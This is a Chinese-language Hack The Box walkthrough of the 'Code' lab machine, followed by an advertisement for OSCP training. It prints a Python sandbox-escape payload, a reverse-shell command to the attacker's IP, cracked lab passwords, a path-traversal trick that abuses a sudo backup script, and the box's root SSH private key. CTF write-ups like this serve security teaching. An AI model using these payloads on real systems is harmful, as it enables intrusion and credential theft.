【HTB】Code靶机渗透

admin 2025年4月7日00:19:47评论26 views字数 5726阅读19分5秒阅读模式

靶机信息

【HTB】Code靶机渗透
image-20250326203709859

大致思路

【HTB】Code靶机渗透
image-20250406190559431

一、信息收集

靶机ip:10.10.11.62

攻击机ip:10.10.16.26

nmap扫描,开放了22和5000端口

【HTB】Code靶机渗透

得到两个信息

# Gunicron 20.0.4
# OpenSSH 8.2p1 (Ubuntu 4ubuntu0.12)

目录扫描

【HTB】Code靶机渗透
image-20250406151908425

子域名爆破也无果

【HTB】Code靶机渗透搜索历史漏洞也没有结果

【HTB】Code靶机渗透
image-20250406152005077

二、边界突破

访问5000端口,尝试调用系统函数,被过滤了

【HTB】Code靶机渗透

随机注册一个用户登录

【HTB】Code靶机渗透

找不到可用信息,只能从代码入手,应该是沙盒逃逸,过滤了许多命令执行函数,如system,eval,os,bulitins,import,subprocess等函数,最终利用魔术方法绕过

print(''.__class__.__mro__[1].__subclasses__()[317]('id',shell=True,stdout=-1).communicate()[0].strip())
【HTB】Code靶机渗透
image-20250406154043082

替换命令进行反弹shell

print(''.__class__.__mro__[1].__subclasses__()[317]('bash -c "/bin/sh -i >&/dev/tcp/10.10.16.26/4444 0>&1"',shell=True,stdout=-1).communicate()[0].strip())

反弹成功

【HTB】Code靶机渗透
image-20250406154839403

成功拿到user.txt

【HTB】Code靶机渗透
image-20250406154934267

三、权限提升

查看密码,发现两个用户具有bash,当前是第一个用户

【HTB】Code靶机渗透
image-20250406155024700

在/home下发现两个用户目录,另外一个无法进入

【HTB】Code靶机渗透
image-20250406155248785

切换目录,在**/app/instance/database.db**下发现泄露的账户密码

【HTB】Code靶机渗透
image-20250406160848927

或者使用sqlite3连接查看

【HTB】Code靶机渗透
image-20250406160727875

数据如下

martin    3de6f30c4a09c27fc71932bfc68474be      nafeelswordsmaster
Mdevelopment   759b74ce43947f5f4c91aeddc3e5bad3   development

解密成功

【HTB】Code靶机渗透
image-20250406160451570

利用ssh登录

【HTB】Code靶机渗透
image-20250406161040354

查看SUID,发现一个at权限

【HTB】Code靶机渗透
image-20250406161740160

查找用法,无法利用

【HTB】Code靶机渗透
image-20250406161729164

sudo -l发现可利用文件

【HTB】Code靶机渗透
image-20250406161111434

代码如下,这段 Bash 脚本是一个用于处理 JSON 配置文件并执行备份任务的脚本,并且只能使用/var和/home下的文件

#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo"Usage: $0 <task.json>"
exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo"Error: File '$json_file' not found."
exit 1
fi

allowed_paths=("/var/""/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\.\./"; ""))'"$json_file")

/usr/bin/echo"$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo"$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
local path="$1"
for allowed_path in"${allowed_paths[@]}"do
if [[ "$path" == $allowed_path* ]]; then
return 0
fi
done
return 1
}

for dir in$directories_to_archivedo
if ! is_allowed_path "$dir"then
        /usr/bin/echo"Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
exit 1
fi
done

/usr/bin/backy "$json_file"#执行备份文件

查看backups目录,发现存在json文件

【HTB】Code靶机渗透
image-20250406161832984

查看task.json内容

【HTB】Code靶机渗透
image-20250406162533560

同时发现该脚本无法修改

【HTB】Code靶机渗透
image-20250406162103340

利用task.json执行试试,解压发现把**/home/app-production**目录下载了下来

【HTB】Code靶机渗透
image-20250406162823794

尝试下载root目录

{
"destination""/home/martin/backups/",
"multiprocessing"true,
"verbose_log"false,
"directories_to_archive": [
"/home/../root"
 ],

"exclude": [
".*"
 ]
}
#sudo /usr/bin/backy.sh task.json

执行失败了

【HTB】Code靶机渗透
image-20250406164353337

删除exclude函数,如下修改

{
"destination""/home/martin/backups/",
"directories_to_archive": [
"/home/..././root"
        ]
}
#tar -xvf 解压

执行

【HTB】Code靶机渗透
image-20250406164816559

解压查看,成功

【HTB】Code靶机渗透
image-20250406164807238

发现**.ssh**

【HTB】Code靶机渗透
image-20250406165325516

查看私钥

【HTB】Code靶机渗透
image-20250406165336155

如下

-----BEGIN OPENSSH PRIVATE KEY-----
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
hdENGN+hVCh//jFwAAAAlyb290QGNvZGU=
-----END OPENSSH PRIVATE KEY-----

保存并修改权限为仅拥有者可读和写,成功切换root权限

【HTB】Code靶机渗透
image-20250406165814263

结束

【HTB】Code靶机渗透
image-20250406165848501

end

oscp

有对红队工作感兴趣,或者有意报考oscp的师傅,可以考虑一下我们的培训课程,加我微信咨询,好处如下:

1.报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看

2.200+台靶机及官方课程,lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑

3.目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频

4.加入课程可享受工作推荐机会,优秀者可内推至红队

5.报考即送送官方文档中文版,以及kali命令详解中文版,纯人工翻译,版权为团队所有

【HTB】Code靶机渗透

资料:

【HTB】Code靶机渗透

知识星球

还可以加入我们的知识星球,包含cs二开,甲壳虫,网恋避险工具,红盟工具等,还有很多src挖掘资料包

【HTB】Code靶机渗透
【HTB】Code靶机渗透
【HTB】Code靶机渗透

学习交流群

公众号后台这里选择学习交流即可,如果图片二维码过期,可以加我微信获取

【HTB】Code靶机渗透

原文始发于微信公众号(泷羽Sec-track):【HTB】Code靶机渗透

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月7日00:19:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【HTB】Code靶机渗透https://cn-sec.com/archives/3921885.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息